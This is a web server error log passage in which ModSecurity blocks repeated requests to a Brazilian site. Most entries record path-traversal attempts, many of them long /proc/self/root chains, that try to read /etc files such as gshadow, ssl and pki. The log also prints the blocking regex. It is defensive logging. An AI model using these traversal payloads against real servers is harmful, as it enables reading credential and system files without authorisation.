[Fri Mar 20 10:41:06.980214 2026] [:error] [pid 9818:tid 140411557287680] [client 57.141.18.77:39778] [client 57.141.18.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1Ocl1pVZ5mVmJwsFNRfwAAAFY"]
[Fri Mar 20 10:41:11.796011 2026] [:error] [pid 11642:tid 140411574073088] [client 57.141.18.9:40166] [client 57.141.18.9] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/gshadow"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1Od7ninkcc-iUj5Ap_lwAAA5Q"]
[Fri Mar 20 10:41:11.895158 2026] [:error] [pid 11167:tid 140411574073088] [client 74.7.243.128:56434] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1Od_HIg5MgXLBnicMYOAAAAdQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 10:41:12.860552 2026] [:error] [pid 26799:tid 140411641214720] [client 74.7.241.31:37706] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1OeNa6ubjKNq_cu4b7kwAAA0w"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 10:41:16.441778 2026] [mime_magic:error] [pid 26799:tid 140411557287680] (70014)End of file found: [client 216.73.216.191:40524] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 10:41:18.296117 2026] [:error] [pid 11167:tid 140411557287680] [client 74.7.241.31:47914] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1OfvHIg5MgXLBnicMYQgAAAdY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 10:41:20.741958 2026] [:error] [pid 11167:tid 140411658000128] [client 74.7.241.31:60928] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1Of_HIg5MgXLBnicMYRAAAAco"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 10:41:22.637605 2026] [:error] [pid 21219:tid 140411725141760] [client 74.7.241.31:60930] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1OgvXLqtnMIWvjpaK9HQAAAoI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 10:41:24.179102 2026] [:error] [pid 10189:tid 140411565680384] [client 74.7.241.31:60946] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1OhDJ3M9BSuKP7CAZEkQAAAJU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 10:41:25.481075 2026] [:error] [pid 7235:tid 140411624429312] [client 74.7.241.31:60960] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1OhfqxLDW4GITHUkQLfQAAAQ4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 10:41:26.837804 2026] [:error] [pid 15826:tid 140411733534464] [client 74.7.241.31:60976] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1OhuoXxyEfFpUF8f-iTAAAAUE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 10:41:28.355309 2026] [:error] [pid 7235:tid 140411674785536] [client 74.7.241.31:39558] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1OiPqxLDW4GITHUkQLfwAAAQg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 10:41:29.240082 2026] [:error] [pid 26799:tid 140411699963648] [client 57.141.18.72:41082] [client 57.141.18.72] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1Oida6ubjKNq_cu4b7swAAA0U"]
[Fri Mar 20 10:41:29.658287 2026] [:error] [pid 7235:tid 140411557287680] [client 74.7.241.31:39564] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1OifqxLDW4GITHUkQLggAAARY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 10:41:31.027514 2026] [:error] [pid 26799:tid 140411557287680] [client 74.7.241.31:39574] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1Oi9a6ubjKNq_cu4b7ugAAA1Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 10:41:32.367267 2026] [:error] [pid 21219:tid 140411666392832] [client 74.7.241.31:39584] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1OjPXLqtnMIWvjpaK9IwAAAok"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 10:41:32.500090 2026] [:error] [pid 15826:tid 140411708356352] [client 57.141.18.15:41184] [client 57.141.18.15] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1OjOoXxyEfFpUF8f-iUQAAAUQ"]
[Fri Mar 20 10:41:35.543323 2026] [:error] [pid 7893:tid 140411582465792] [client 74.7.241.31:39596] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1OjxCii7xarUs8iHaMhQAAAhM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 10:41:36.889831 2026] [:error] [pid 11642:tid 140411666392832] [client 74.7.241.31:39604] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1OkLninkcc-iUj5Ap_qQAAA4k"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 10:41:38.475568 2026] [:error] [pid 7235:tid 140411632822016] [client 74.7.241.31:38450] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1OkvqxLDW4GITHUkQLhgAAAQ0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 10:41:39.731359 2026] [:error] [pid 11642:tid 140411540502272] [client 74.7.241.31:38458] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1Ok7ninkcc-iUj5Ap_sAAAA5g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 10:41:41.095469 2026] [:error] [pid 26799:tid 140411649607424] [client 74.7.241.31:38464] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1Olda6ubjKNq_cu4b7xwAAA0s"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 10:41:41.737038 2026] [:error] [pid 10189:tid 140411624429312] [client 57.141.18.82:41468] [client 57.141.18.82] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1OlTJ3M9BSuKP7CAZElwAAAI4"]
[Fri Mar 20 10:41:42.344611 2026] [:error] [pid 10189:tid 140411574073088] [client 74.7.241.31:38466] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1OljJ3M9BSuKP7CAZEmQAAAJQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 10:41:42.563534 2026] [:error] [pid 26799:tid 140411716749056] [client 74.7.243.128:50528] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id 